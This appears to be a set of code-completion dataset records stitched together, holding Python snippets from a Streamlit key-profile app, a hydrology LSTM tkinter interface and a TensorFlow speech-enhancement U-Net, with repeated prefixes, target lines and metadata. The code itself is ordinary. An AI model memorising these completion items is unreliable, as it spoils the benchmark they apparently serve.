"snippet": "def compute_mIoU(gt_dir, pred_dir, png_name_list, num_classes, name_classes=None): \r\n print('Num classes', num_classes) \r\n\r\n hist = np.zeros((num_classes, num_classes))\r\n\r\n gt_imgs = [join(gt_dir, x + \".png\") for x in png_name_list]\r\n pred_imgs = [join(pred_dir, x + \".png\") for x in png_name_list]\r\n\r\n for ind in range(len(gt_imgs)): \r\n\r\n pred = np.array(Image.open(pred_imgs[ind]))\r\n label = np.array(Image.open(gt_imgs[ind]))\r\n if len(label.flatten()) != len(pred.flatten()): \r\n print(\r\n 'Skipping: len(gt) = {:d}, len(pred) = {:d}, {:s}, {:s}'.format(\r\n len(label.flatten()), len(pred.flatten()), gt_imgs[ind],\r\n pred_imgs[ind]))\r\n continue\r\n\r\n hist += fast_hist(label.flatten(), pred.flatten(), num_classes) \r\n\r\n if name_classes is not None and ind > 0 and ind % 10 == 0: \r\n print('{:d} / {:d}: mIou-{:0.2f}%; mPA-{:0.2f}%; Accuracy-{:0.2f}%'.format(\r\n ind, \r\n len(gt_imgs),\r\n 100 * np.nanmean(per_class_iu(hist)),\r\n 100 * np.nanmean(per_class_PA_Recall(hist)),\r\n 100 * per_Accuracy(hist)\r\n )\r\n )\r\n\r\n IoUs = per_class_iu(hist)\r\n PA_Recall = per_class_PA_Recall(hist)\r\n Precision = per_class_Precision(hist)\r\n\r\n if name_classes is not None:\r\n for ind_class in range(num_classes):\r\n print('===>' + name_classes[ind_class] + ':\\tIou-' + str(round(IoUs[ind_class] * 100, 2)) \\\r\n + '; Recall (equal to the PA)-' + str(round(PA_Recall[ind_class] * 100, 2))+ '; Precision-' + str(round(Precision[ind_class] * 100, 2)))\r\n\r\n print('===> mIoU: ' + str(round(np.nanmean(IoUs) * 100, 2)) + '; mPA: ' + str(round(np.nanmean(PA_Recall) * 100, 2)) + '; Accuracy: ' + str(round(per_Accuracy(hist) * 100, 2))) \r\n return np.array(hist, np.int), IoUs, PA_Recall, Precision\r"
}
] | import os
import matplotlib
import torch
import torch.nn.functional as F
import scipy.signal
import cv2
import shutil
import numpy as np
from matplotlib import pyplot as plt
from PIL import Image
from tqdm import tqdm
from torch.utils.tensorboard import SummaryWriter
from .utils import cvtColor, preprocess_input, resize_image
from .utils_metrics import compute_mIoU
| 1,702 |
matplotlib.use('Agg')
class LossHistory():
def __init__(self, log_dir, model, input_shape):
self.log_dir = log_dir
self.losses = []
self.val_loss = []
os.makedirs(self.log_dir)
self.writer = SummaryWriter(self.log_dir)
try:
dummy_input = torch.randn(2, 3, input_shape[0], input_shape[1])
self.writer.add_graph(model, dummy_input)
except:
pass
def append_loss(self, epoch, loss, val_loss):
if not os.path.exists(self.log_dir):
os.makedirs(self.log_dir)
self.losses.append(loss)
self.val_loss.append(val_loss)
with open(os.path.join(self.log_dir, "epoch_loss.txt"), 'a') as f:
f.write(str(loss))
f.write("\n")
with open(os.path.join(self.log_dir, "epoch_val_loss.txt"), 'a') as f:
f.write(str(val_loss))
f.write("\n")
self.writer.add_scalar('loss', loss, epoch)
self.writer.add_scalar('val_loss', val_loss, epoch)
self.loss_plot()
def loss_plot(self):
iters = range(len(self.losses))
plt.figure()
plt.plot(iters, self.losses, 'red', linewidth = 2, label='train loss')
plt.plot(iters, self.val_loss, 'coral', linewidth = 2, label='val loss')
try:
if len(self.losses) < 25:
num = 5
else:
num = 15
plt.plot(iters, scipy.signal.savgol_filter(self.losses, num, 3), 'green', linestyle = '--', linewidth = 2, label='smooth train loss')
plt.plot(iters, scipy.signal.savgol_filter(self.val_loss, num, 3), '#8B4513', linestyle = '--', linewidth = 2, label='smooth val loss')
except:
pass
plt.grid(True)
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.legend(loc="upper right")
plt.savefig(os.path.join(self.log_dir, "epoch_loss.png"))
plt.cla()
plt.close("all")
class EvalCallback():
def __init__(self, net, input_shape, num_classes, image_ids, dataset_path, log_dir, cuda, \
miou_out_path=".temp_miou_out", eval_flag=True, period=1):
super(EvalCallback, self).__init__()
self.net = net
self.input_shape = input_shape
self.num_classes = num_classes
self.image_ids = image_ids
self.dataset_path = dataset_path
self.log_dir = log_dir
self.cuda = cuda
self.miou_out_path = miou_out_path
self.eval_flag = eval_flag
self.period = period
self.image_ids = [image_id.split()[0] for image_id in image_ids]
self.mious = [0]
self.epoches = [0]
if self.eval_flag:
with open(os.path.join(self.log_dir, "epoch_miou.txt"), 'a') as f:
f.write(str(0))
f.write("\n")
def get_miou_png(self, image):
image = cvtColor(image)
orininal_h = np.array(image).shape[0]
orininal_w = np.array(image).shape[1]
image_data, nw, nh = resize_image(image, (self.input_shape[1],self.input_shape[0]))
|
matplotlib.use('Agg')
class LossHistory():
def __init__(self, log_dir, model, input_shape):
self.log_dir = log_dir
self.losses = []
self.val_loss = []
os.makedirs(self.log_dir)
self.writer = SummaryWriter(self.log_dir)
try:
dummy_input = torch.randn(2, 3, input_shape[0], input_shape[1])
self.writer.add_graph(model, dummy_input)
except:
pass
def append_loss(self, epoch, loss, val_loss):
if not os.path.exists(self.log_dir):
os.makedirs(self.log_dir)
self.losses.append(loss)
self.val_loss.append(val_loss)
with open(os.path.join(self.log_dir, "epoch_loss.txt"), 'a') as f:
f.write(str(loss))
f.write("\n")
with open(os.path.join(self.log_dir, "epoch_val_loss.txt"), 'a') as f:
f.write(str(val_loss))
f.write("\n")
self.writer.add_scalar('loss', loss, epoch)
self.writer.add_scalar('val_loss', val_loss, epoch)
self.loss_plot()
def loss_plot(self):
iters = range(len(self.losses))
plt.figure()
plt.plot(iters, self.losses, 'red', linewidth = 2, label='train loss')
plt.plot(iters, self.val_loss, 'coral', linewidth = 2, label='val loss')
try:
if len(self.losses) < 25:
num = 5
else:
num = 15
plt.plot(iters, scipy.signal.savgol_filter(self.losses, num, 3), 'green', linestyle = '--', linewidth = 2, label='smooth train loss')
plt.plot(iters, scipy.signal.savgol_filter(self.val_loss, num, 3), '#8B4513', linestyle = '--', linewidth = 2, label='smooth val loss')
except:
pass
plt.grid(True)
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.legend(loc="upper right")
plt.savefig(os.path.join(self.log_dir, "epoch_loss.png"))
plt.cla()
plt.close("all")
class EvalCallback():
def __init__(self, net, input_shape, num_classes, image_ids, dataset_path, log_dir, cuda, \
miou_out_path=".temp_miou_out", eval_flag=True, period=1):
super(EvalCallback, self).__init__()
self.net = net
self.input_shape = input_shape
self.num_classes = num_classes
self.image_ids = image_ids
self.dataset_path = dataset_path
self.log_dir = log_dir
self.cuda = cuda
self.miou_out_path = miou_out_path
self.eval_flag = eval_flag
self.period = period
self.image_ids = [image_id.split()[0] for image_id in image_ids]
self.mious = [0]
self.epoches = [0]
if self.eval_flag:
with open(os.path.join(self.log_dir, "epoch_miou.txt"), 'a') as f:
f.write(str(0))
f.write("\n")
def get_miou_png(self, image):
image = cvtColor(image)
orininal_h = np.array(image).shape[0]
orininal_w = np.array(image).shape[1]
image_data, nw, nh = resize_image(image, (self.input_shape[1],self.input_shape[0]))
| image_data = np.expand_dims(np.transpose(preprocess_input(np.array(image_data, np.float32)), (2, 0, 1)), 0)
| 1 | 2023-12-14 13:24:53+00:00 | 4k |
yacinxx/dnakey | create_profile.py | [
{
"identifier": "PrimeKeyConfig",
"path": "prime_key_config.py",
"snippet": "class PrimeKeyConfig:\r\n def agent_prime_key(self, hash_key:str) -> str | int:\r\n MAX_LENGTH = 56\r\n self.hash_key = hash_key\r\n if (self.hash_key) and (len(self.hash_key) == MAX_LENGTH) and (self.hash_key.startswith(\"dnakey$\")):\r\n positions_to_remove = [10, 20, 30, 40, 48]\r\n self.hash_key = self.hash_key.replace('dnakey$', '')\r\n is_prime = ''.join([self.hash_key[i] for i in positions_to_remove])\r\n if is_prime == \"PRIME\":\r\n valid_hash_key = ''.join([self.hash_key[i] for i in range(len(self.hash_key)) if i not in positions_to_remove])\r\n config_has_key = f\"dnakey${valid_hash_key[:32:2]}\"\r\n config_manager = list(ConfigManager(config_has_key).configuration().keys())\r\n if config_has_key in config_manager:\r\n toast(\"**:blue[The Prime key is valid!]**\", icon=\"🧁\")\r\n time.sleep(1)\r\n return valid_hash_key\r\n else:\r\n info(\"This Prime key not registered yet!\", icon=\"😮\")\r\n return 1 \r\n else:\r\n error(\"This is not a Prime key!\")\r\n return 1\r\n elif self.hash_key and len(self.hash_key) != MAX_LENGTH:\r\n error(\"The Prime key is not valid!\")\r\n return 1\r\n else:\r\n return 1"
},
{
"identifier": "ConfigManager",
"path": "profile_config/config_manager.py",
"snippet": "class ConfigManager:\r\n def __init__(self, prime_key:str) -> None:\r\n with open(\"profile_config/profile_config.json\", \"r\") as f: \r\n self.profile_data = __import__(\"json\").loads(f.read())\r\n self.profile_config = self.profile_data[\"profiles_config\"]\r\n self.prime_key = prime_key\r\n self.create_date = datetime.datetime.now()\r\n self.formatted_datetime = self.create_date.isoformat()\r\n\r\n def configuration(self):\r\n return self.profile_config\r\n \r\n def update_created_profiles(self):\r\n self.profile_config[self.prime_key][\"created_profiles\"] +=1\r\n toast(\":orange[**1 Profile has been added to your prime key**]\", icon=\"🍨\")\r\n return self.profile_config[self.prime_key][\"created_profiles\"]\r\n\r\n def get_date_time(self):\r\n return self.profile_config[self.prime_key][\"date_time\"]\r\n\r\n def update_date_time(self):\r\n if self.profile_config[self.prime_key][\"date_time\"] is None:\r\n self.profile_config[self.prime_key].update({\"date_time\": self.formatted_datetime})\r\n success(\"**You 'Prime Key' has been activated successfully!**\", icon=\"🍧\")\r\n snow()\r\n \r\n def update_profile_activity(self, id_profile:int, activate_merge:bool, save_cookies:bool, formatted_datetime:str) -> None:\r\n self.action = self.profile_config[self.prime_key][\"profile_activity\"][\"action\"]\r\n if id_profile not in self.action:\r\n self.action.update({id_profile:{\r\n \"active_usage\": 0,\r\n \"active_merge\": activate_merge,\r\n \"date_time\": formatted_datetime,\r\n \"request_status\": \"online\",\r\n \"save_cookies\": save_cookies,\r\n \"version\": VERSION}\r\n })\r\n\r\n def get_created_profiles(self):\r\n return self.profile_config[self.prime_key][\"created_profiles\"]\r\n\r\n def get_active_profiles(self):\r\n active_profiles_ids = []\r\n active_profiles = 0\r\n active_profiles_list = list(self.profile_config[self.prime_key][\"profile_activity\"][\"action\"])\r\n for i in active_profiles_list:\r\n if self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][i][\"active_usage\"] != 0:\r\n active_profiles+=1\r\n active_profiles_ids.append(f\"id:{i}\")\r\n return active_profiles, active_profiles_ids if len(active_profiles_ids) != 0 else \"\" \r\n\r\n def get_online_profiles(self):\r\n all_profiles_online = [] \r\n active_profiles_list = list(self.profile_config[self.prime_key][\"profile_activity\"][\"action\"])\r\n for i in active_profiles_list:\r\n if self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][i][\"request_status\"] == \"online\":\r\n all_profiles_online.append(\"online\")\r\n else:\r\n all_profiles_online.append(\"offline\")\r\n if all(profile == \"online\" for profile in all_profiles_online):\r\n return \"Online!\"\r\n else:\r\n return \"Not all profiles are online!\"\r\n\r\n def check_active_usage(self):\r\n all_profiles_active_usage = []\r\n for i in list(self.profile_config[self.prime_key][\"profile_activity\"][\"action\"]):\r\n all_profiles_active_usage.append(self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][i][\"active_usage\"])\r\n if all(profile == 0 for profile in all_profiles_active_usage):\r\n return \"first_time\"\r\n\r\n def get_profile_active_usage(self, id_profile:str) -> int:\r\n return self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][id_profile][\"active_usage\"]\r\n\r\n def update_profile_active_usage(self, id_profile:str) -> None:\r\n self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][id_profile][\"active_usage\"] +=1\r\n\r\n def get_merge_active_usage(self):\r\n return len(list(self.profile_config[self.prime_key][\"profile_activity\"][\"action_merge\"]))\r\n\r\n def get_profile_action_merge(self, id_profile:str) -> list[int]:\r\n get_merge = self.profile_config[self.prime_key][\"profile_activity\"][\"action_merge\"][id_profile]\r\n action_merge_len = len(list(get_merge.keys()))\r\n action_merge = sum(list(get_merge.values()))\r\n return action_merge_len, action_merge\r\n\r\n def update_profile_action_merge(self, id_profile:str, merge_with:str) -> None:\r\n action_merge = self.profile_config[self.prime_key][\"profile_activity\"][\"action_merge\"]\r\n if id_profile not in list(action_merge.keys()):\r\n action_merge.update({id_profile:{f\"({id_profile},{merge_with})\": 0}})\r\n if id_profile in list(action_merge.keys()):\r\n if f\"({id_profile},{merge_with})\" in list(action_merge[id_profile].keys()):\r\n action_merge[id_profile][f\"({id_profile},{merge_with})\"] +=1 \r\n else:\r\n action_merge[id_profile].update({f\"({id_profile},{merge_with})\": 0}) \r\n action_merge[id_profile][f\"({id_profile},{merge_with})\"] +=1 \r\n \r\n def update_config(self):\r\n with open(\"profile_config/profile_config.json\", \"w\") as f:\r\n __import__(\"json\").dump(self.profile_data, f, indent=3)\r"
}
] | import streamlit as st
import pandas as pd
import time
import enginev2
from prime_key_config import PrimeKeyConfig
from profile_config.config_manager import ConfigManager
| 1,720 |
class CreateProfile(PrimeKeyConfig):
def new_profile(self):
key_id = "prime-key-profile"
self.hash_key = st.text_input("Enter Your Prime Key: (:red[Required])",
type="password",
help="Prime Key is your login token method so 'DnaKey' can recognize you!",
key=key_id)
self.create_hash_key = self.agent_prime_key(self.hash_key)
if self.create_hash_key == 1:
self.tab_name = "Create Profile"
return
else:
self.tab_name = "Create Profile"
self.config_has_key = f"dnakey${self.create_hash_key[:32:2]}"
|
class CreateProfile(PrimeKeyConfig):
def new_profile(self):
key_id = "prime-key-profile"
self.hash_key = st.text_input("Enter Your Prime Key: (:red[Required])",
type="password",
help="Prime Key is your login token method so 'DnaKey' can recognize you!",
key=key_id)
self.create_hash_key = self.agent_prime_key(self.hash_key)
if self.create_hash_key == 1:
self.tab_name = "Create Profile"
return
else:
self.tab_name = "Create Profile"
self.config_has_key = f"dnakey${self.create_hash_key[:32:2]}"
| self.config_manager = ConfigManager(self.config_has_key)
| 1 | 2023-12-18 22:04:13+00:00 | 4k |
tamnva/hydroecolstm | hydroecolstm/interface/project_summary_frame.py | [
{
"identifier": "config_to_text",
"path": "hydroecolstm/interface/utility.py",
"snippet": "def config_to_text(config):\n out_text = []\n for key in config.keys(): \n # Write list object in multiple lines \n if type(config[key]) is list:\n out_text.append(key + \":\\n\")\n for element in config[key]:\n out_text.append(\" - \" + str(element) + \"\\n\")\n \n elif type(config[key]) is dict:\n config_key = config[key]\n out_text.append(key + \":\\n\")\n \n for key in config_key.keys():\n if type(config_key[key]) is list:\n out_text.append(\" \" + key + \":\\n\")\n for element in config_key[key]:\n out_text.append(\" - \" + str(element) + \"\\n\")\n else:\n out_text.append(\" \" + key +\": \" + str(config_key[key]) + \"\\n\")\n else:\n try:\n # Convert time in config to YYYY-MM-DD HH:MM\n if (config[key].shape[0] == 2):\n out_text.append(key +\": \\n\")\n if key == \"train_period\":\n out_text.append(\" - \" + str(config[\"train_period\"][0])[:16] + \"\\n\")\n out_text.append(\" - \" + str(config[\"train_period\"][1])[:16] + \"\\n\")\n else:\n out_text.append(\" - \" + str(config[\"test_period\"][0])[:16] + \"\\n\")\n out_text.append(\" - \" + str(config[\"test_period\"][1])[:16] + \"\\n\") \n except:\n # Non list object writte in 1 line\n out_text.append(key +\": \" + str(config[key]) + \"\\n\")\n #out_text.append(\"\\n\")\n \n return out_text"
},
{
"identifier": "sort_key",
"path": "hydroecolstm/interface/utility.py",
"snippet": "def sort_key(config):\n config_sort = {}\n \n if \"dynamic_data_file\" in config.keys():\n config_sort[\"dynamic_data_file\"] = config[\"dynamic_data_file\"]\n\n if \"static_data_file\" in config.keys():\n config_sort[\"static_data_file\"] = config[\"static_data_file\"]\n\n if \"input_static_features\" in config.keys():\n config_sort[\"input_static_features\"] = config[\"input_static_features\"] \n\n if \"input_dynamic_features\" in config.keys():\n config_sort[\"input_dynamic_features\"] = config[\"input_dynamic_features\"] \n\n if \"target_features\" in config.keys():\n config_sort[\"target_features\"] = config[\"target_features\"] \n\n if \"object_id\" in config.keys():\n config_sort[\"object_id\"] = config[\"object_id\"] \n\n if \"train_period\" in config.keys():\n config_sort[\"train_period\"] = config[\"train_period\"]\n\n if \"test_period\" in config.keys():\n config_sort[\"test_period\"] = config[\"test_period\"]\n \n if \"model_class\" in config.keys():\n config_sort[\"model_class\"] = config[\"model_class\"]\n\n if \"REG\" in config.keys():\n config_sort[\"REG\"] = config[\"REG\"]\n \n if \"REG\" in config.keys():\n config_sort[\"REG\"] = config[\"REG\"]\n\n if \"scaler_input_dynamic_features\" in config.keys():\n config_sort[\"scaler_input_dynamic_features\"] = config[\"scaler_input_dynamic_features\"] \n\n if \"scaler_input_static_features\" in config.keys():\n config_sort[\"scaler_input_static_features\"] = config[\"scaler_input_static_features\"] \n\n if \"scaler_target_features\" in config.keys():\n config_sort[\"scaler_target_features\"] = config[\"scaler_target_features\"] \n\n if \"hidden_size\" in config.keys():\n config_sort[\"hidden_size\"] = config[\"hidden_size\"] \n\n if \"num_layers\" in config.keys():\n config_sort[\"num_layers\"] = config[\"num_layers\"] \n \n if \"n_epochs\" in config.keys():\n config_sort[\"n_epochs\"] = config[\"n_epochs\"] \n\n if \"learning_rate\" in config.keys():\n config_sort[\"learning_rate\"] = config[\"learning_rate\"] \n\n if \"dropout\" in config.keys():\n config_sort[\"dropout\"] = config[\"dropout\"] \n\n if \"warmup_length\" in config.keys():\n config_sort[\"warmup_length\"] = config[\"warmup_length\"] \n\n if \"optim_method\" in config.keys():\n config_sort[\"optim_method\"] = config[\"optim_method\"] \n\n if \"objective_function_name\" in config.keys():\n config_sort[\"objective_function_name\"] = config[\"objective_function_name\"] \n\n if \"output_dir\" in config.keys():\n config_sort[\"output_dir\"] = config[\"output_dir\"]\n\n if \"output_dir\" in config.keys():\n config_sort[\"output_dir\"] = config[\"output_dir\"] \n\n if \"static_data_file_forecast\" in config.keys():\n config_sort[\"static_data_file_forecast\"] = config[\"static_data_file_forecast\"] \n\n if \"dynamic_data_file_forecast\" in config.keys():\n config_sort[\"dynamic_data_file_forecast\"] = config[\"dynamic_data_file_forecast\"] \n \n if \"forecast_period\" in config.keys():\n config_sort[\"forecast_period\"] = config[\"forecast_period\"] \n\n if \"object_id_forecast\" in config.keys():\n config_sort[\"object_id_forecast\"] = config[\"object_id_forecast\"]\n \n return config_sort"
},
{
"identifier": "write_yml_file",
"path": "hydroecolstm/interface/utility.py",
"snippet": "def write_yml_file(config, out_file):\n # Convert config to text\n output_text = config_to_text(config=sort_key(config))\n \n # Write config to config file\n with open(out_file, \"w\") as config_file:\n for line in output_text:\n config_file.write(line)"
}
] | import customtkinter as ctk
import tkinter as tk
import torch
from CTkToolTip import CTkToolTip
from CTkMessagebox import CTkMessagebox
from pathlib import Path
from hydroecolstm.interface.utility import config_to_text, sort_key
from hydroecolstm.interface.utility import write_yml_file | 2,027 |
class ProjectSummaryFrame(ctk.CTkFrame):
def __init__(self, container=None, config=None):
super().__init__(container)
self.config = config
# setup the grid layout manager
self.columnconfigure(0, weight=1)
self.rowconfigure((0), weight=0)
self.rowconfigure((1), weight=1)
self.rowconfigure((2), weight=0)
self.__create_widgets()
# create widgets for sidebar frame
def __create_widgets(self):
self.update_summary = ctk.CTkButton(self, text="Project Summary",
font=ctk.CTkFont(size=20, weight="bold"),
command=self.update_project_summary,
fg_color = "transparent",
text_color="black")
self.update_summary.grid(row=0, column=0, pady=0, padx=0)
CTkToolTip(self.update_summary, delay=0.1, bg_color = 'orange',
text_color = 'black', anchor = 'w',
message= 'Click here to update the project summary')
self.summary_textbox = ctk.CTkTextbox(master=self,corner_radius=0,
height=2000,
bg_color='transparent',
fg_color='transparent',
activate_scrollbars=True,
wrap='none')
self.summary_textbox.grid(row=1, column=0,pady=(10,7), padx=0)
self.summary_textbox.insert("end", "Click 'Project Summary'\n" )
self.summary_textbox.insert("end", "to see project info: " )
self.summary_textbox.configure(spacing3=10)
self.save_buton = ctk.CTkButton(self, border_color="grey",
border_width=1.5,
command=self.save_yml,
text = "Save",
fg_color = "transparent",
text_color="black")
CTkToolTip(self.save_buton, delay=0.1, bg_color = 'orange',
text_color = 'black', anchor = 'n', wraplength=500,
message= 'Click here to save project summary as' +
' configuration file (here, you can give the file name)' +
' or save all (all data created by this tool + the model +' +
' configuration file (here you cannot give the file name,' +
' just select the folder and files with predefined names will be saved')
self.save_buton.grid(row=2, column=0,pady=(10,7), padx=0)
def update_project_summary(self):
# Delete text
self.summary_textbox.delete("0.0", "end")
|
class ProjectSummaryFrame(ctk.CTkFrame):
def __init__(self, container=None, config=None):
super().__init__(container)
self.config = config
# setup the grid layout manager
self.columnconfigure(0, weight=1)
self.rowconfigure((0), weight=0)
self.rowconfigure((1), weight=1)
self.rowconfigure((2), weight=0)
self.__create_widgets()
# create widgets for sidebar frame
def __create_widgets(self):
self.update_summary = ctk.CTkButton(self, text="Project Summary",
font=ctk.CTkFont(size=20, weight="bold"),
command=self.update_project_summary,
fg_color = "transparent",
text_color="black")
self.update_summary.grid(row=0, column=0, pady=0, padx=0)
CTkToolTip(self.update_summary, delay=0.1, bg_color = 'orange',
text_color = 'black', anchor = 'w',
message= 'Click here to update the project summary')
self.summary_textbox = ctk.CTkTextbox(master=self,corner_radius=0,
height=2000,
bg_color='transparent',
fg_color='transparent',
activate_scrollbars=True,
wrap='none')
self.summary_textbox.grid(row=1, column=0,pady=(10,7), padx=0)
self.summary_textbox.insert("end", "Click 'Project Summary'\n" )
self.summary_textbox.insert("end", "to see project info: " )
self.summary_textbox.configure(spacing3=10)
self.save_buton = ctk.CTkButton(self, border_color="grey",
border_width=1.5,
command=self.save_yml,
text = "Save",
fg_color = "transparent",
text_color="black")
CTkToolTip(self.save_buton, delay=0.1, bg_color = 'orange',
text_color = 'black', anchor = 'n', wraplength=500,
message= 'Click here to save project summary as' +
' configuration file (here, you can give the file name)' +
' or save all (all data created by this tool + the model +' +
' configuration file (here you cannot give the file name,' +
' just select the folder and files with predefined names will be saved')
self.save_buton.grid(row=2, column=0,pady=(10,7), padx=0)
def update_project_summary(self):
# Delete text
self.summary_textbox.delete("0.0", "end") | output_text = config_to_text(config=sort_key(self.config)) | 1 | 2023-12-20 09:11:36+00:00 | 4k |
ContigoAI/tf1-phase-aware-speech-enhancement | code/main.py | [
{
"identifier": "Flags",
"path": "code/config.py",
"snippet": "class Flags():\n def __init__(self):\n # Model Training\n self.LoadSavedModel = True # Flag indicating whether to load a saved model\n\n # Model Parameters\n self.channels = 16384 # Number of channels\n self.threads = 1 # Number of threads\n self.epochs = 20 # Number of training epochs\n self.batch_size = 4 # Batch size\n self.validation_size = 0.05 # Fraction of data used for validation\n\n # Audio Processing Parameters\n self.stft_freq_samples = 512 # STFT frequency samples\n self.fs = 10e3 # Sampling frequency\n self.net_size = 2 # Size of the neural network\n self.overlap = 8 # Overlap factor\n self.noverlap = int((1 - 1.0 / self.overlap) * self.stft_freq_samples) # Non-overlapping samples\n\n # File Paths\n self.check_name = \"<>\" # Checkpoint name\n self.ckdir = F\"<>\" # Checkpoint directory\n self.resultDir = F\"<>\"\n\n # Data Directories\n self.train_noise_dir = F\"<>\" # Directory for training noise data\n self.train_clean_dir = F\"<>\" # Directory for training clean data\n\n # Model Training Hyperparameters\n self.regulizer_weight = 1e-1 # Regularization weight\n self.learning_rate = 5e-3 # Initial learning rate\n self.end_learning_rate = 1e-5 # Final learning rate"
},
{
"identifier": "audio_generator_complex",
"path": "code/utils.py",
"snippet": "def audio_generator_complex(files, flags):\n \"\"\"\n Generate audio samples for training or testing.\n\n Parameters:\n - files (list): List of WAV file names.\n - flags: Flags object containing configuration parameters.\n\n Yields:\n - tuple: Tuple containing noise and clean audio samples.\n \"\"\"\n\n for file in files:\n noise, fs = librosa.load(os.path.join(flags.train_noise_dir, file), sr=flags.fs)\n clean, fs = librosa.load(os.path.join(flags.train_clean_dir, file), sr=flags.fs)\n\n channels = flags.channels\n window = int(channels)\n size_samples = len(noise)\n assert len(noise) == len(clean), \"clean and noise lengths must match\"\n\n samples_per_file = int((size_samples // window))\n\n for i in range(size_samples):\n if i * window + channels >= size_samples:\n break\n noise_channels_raw = noise[i * window:i * window + channels]\n clean_channels_raw = clean[i * window:i * window + channels]\n\n yield noise_channels_raw, clean_channels_raw, samples_per_file"
},
{
"identifier": "config_dataset",
"path": "code/utils.py",
"snippet": "def config_dataset(dataset, flags):\n \"\"\"\n Configure the input dataset for training.\n\n Parameters:\n - dataset: TensorFlow dataset.\n - flags: Flags object containing configuration parameters.\n\n Returns:\n - dataset: Configured TensorFlow dataset.\n \"\"\"\n dataset = dataset.repeat(flags.epochs)\n dataset = dataset.batch(flags.batch_size)\n dataset = dataset.prefetch(flags.batch_size)\n return dataset"
},
{
"identifier": "get_graph_size",
"path": "code/utils.py",
"snippet": "def get_graph_size():\n \"\"\"\n Calculate and return the size of the TensorFlow graph in megabytes.\n\n Returns:\n - str: Size of the TensorFlow graph in megabytes.\n \"\"\"\n vars = 0\n for v in tf.all_variables():\n vars += np.prod(v.get_shape().as_list())\n return \"{} mega\".format((4 * vars) / (1e6))"
},
{
"identifier": "get_wav_files",
"path": "code/utils.py",
"snippet": "def get_wav_files(path):\n \"\"\"\n Get a list of WAV file names from the specified path.\n\n Parameters:\n - path (str): Path to the directory containing WAV files.\n\n Returns:\n - List[str]: List of WAV file names.\n \"\"\"\n return [os.path.basename(x) for x in glob.glob(path + '/*.wav')]"
},
{
"identifier": "weighted_sdr_loss",
"path": "code/loss.py",
"snippet": "def weighted_sdr_loss(X, y_pred, y_true):\n \"\"\"\n Compute weighted SDR loss considering both voice and noise components.\n\n Args:\n X: Original signal\n y_pred: Predicted signal\n y_true: Target signal\n\n Returns:\n Weighted SDR loss\n \"\"\"\n # SDR loss for the voice component\n voice_target = -sdr_loss(y_true, y_pred)\n\n # SDR loss for the noise component\n noise_target = -sdr_loss(X - y_true, X - y_pred)\n\n # Weighting factor alpha based on the ratio of norms of target voice and target noise\n alpha = tf.reduce_mean(tf.norm(y_true) / (tf.norm(X - y_true) + tf.norm(y_true)))\n\n # Combine voice and noise losses with weights and return the result\n return alpha * voice_target + (1 - alpha) * noise_target"
},
{
"identifier": "make_asppunet_3D",
"path": "code/network.py",
"snippet": "def make_asppunet_3D(X, training, flags=None, features=1, last_pad=False, mask=False):\n \"\"\"\n Build a 3D Complex U-Net with ASPP.\n\n Args:\n X: Input tensor.\n training: Whether the model is in training mode.\n flags: Flags object.\n features: Number of features.\n last_pad: Whether to add padding in the final convolution.\n mask: Whether to apply a mask.\n\n Returns:\n Tuple containing the output tensor, magnitude tensor, and list of intermediate tensors.\n \"\"\"\n \n input_ = X\n net = input_\n frame_step = flags.stft_freq_samples - flags.noverlap - 2\n pre_name = 'pre_process'\n mag = None\n\n with tf.variable_scope(pre_name): #,reuse = tf.AUTO_REUSE):\n pre = net\n pre = tf.contrib.signal.stft(pre, frame_length=flags.stft_freq_samples,frame_step=frame_step)\n pre_stacked = tf.stack([tf.math.real(pre), tf.math.imag(pre)], axis=1)\n pre_stacked = tf.expand_dims(pre_stacked, axis=-1)\n\n conv1, pool1 = res_pool_3D(pre_stacked, [8 * features, 8 * features], training, flags, name=1)\n conv2, pool2 = res_pool_3D(pool1, [16 * features, 16 * features], training, flags, name=2)\n conv3, pool3 = res_pool_3D(pool2, [32 * features, 32 * features], training, flags, name=3)\n conv4, pool4 = res_pool_3D(pool3, [64 * features, 64 * features], training, flags, name=4)\n conv5 = res_pool_3D(pool4, [128 * features, 128 * features], training, flags,\n name=5, pool=False, dilation=[2, 2])\n\n up6 = upconv_concat_3D(conv5, conv4, 64 * features, flags, name=6)\n conv6 = res_pool_3D(up6, [64 * features, 64 * features], training, flags, name=6, pool=False)\n\n up7 = upconv_concat_3D(conv6, conv3, 32 * features, flags, name=7)\n conv7 = res_pool_3D(up7, [32 * features, 32 * features], training, flags, name=7, pool=False)\n\n up8 = upconv_concat_3D(conv7, conv2, 16 * features, flags, name=8)\n conv8 = res_pool_3D(up8, [16 * features, 16 * features], training, flags, name=8, pool=False)\n\n up9 = upconv_concat_3D(conv8, None, 8 * features, flags, name=9)\n conv9 = res_pool_3D(up9, [8 * features, 8 * features], training, flags, name=9, pool=False)\n\n final_name = 'final'\n with tf.variable_scope(final_name): #, reuse = tf.AUTO_REUSE):\n if last_pad:\n final = tf.pad(conv9, [[0, 0], [0, 0], [1, 0], [1, 0], [0, 0]])\n final = ComplexConv3D(\n 1, (1, 1, 1),\n name=final_name,\n activation=None,\n padding='same')(final)\n post_name = 'post_process'\n with tf.variable_scope(post_name): #, reuse = tf.AUTO_REUSE):\n post = tf.squeeze(final, axis=-1)\n post = tf.complex(post[:, 0], post[:, 1])\n if mask:\n phase = post / (tf.complex(tf.abs(post), 0.) + tf.complex(0.000001, 0.))\n mag = tf.tanh(tf.abs(post))\n post = phase * tf.complex(mag, 0.) * pre\n post = tf.contrib.signal.inverse_stft(post, frame_length=flags.stft_freq_samples,\n frame_step=frame_step)\n post = tf.real(post)\n\n return (post, mag, [conv1, conv2, conv3, conv4, conv5, conv6, conv7, conv8, conv9, final])"
}
] | from .config import Flags
from .utils import audio_generator_complex, config_dataset, get_graph_size, get_wav_files
from .loss import weighted_sdr_loss
from .network import make_asppunet_3D
import tensorflow as tf
import datetime
import sklearn
import os
import time
import numpy as np
import scipy
import random | 3,338 |
def make_train_op(X, y_pred, y_true, flags, additional_loss_input):
"""
Create the training operation.
Args:
X: Input tensor.
y_pred: Predicted output tensor.
y_true: True output tensor.
flags: Flags object.
additional_loss_input: Additional loss input tensor.
Returns:
Tuple containing the training operation and the loss tensor.
"""
# Loss Calculation:
loss = weighted_sdr_loss(X, y_pred, y_true)
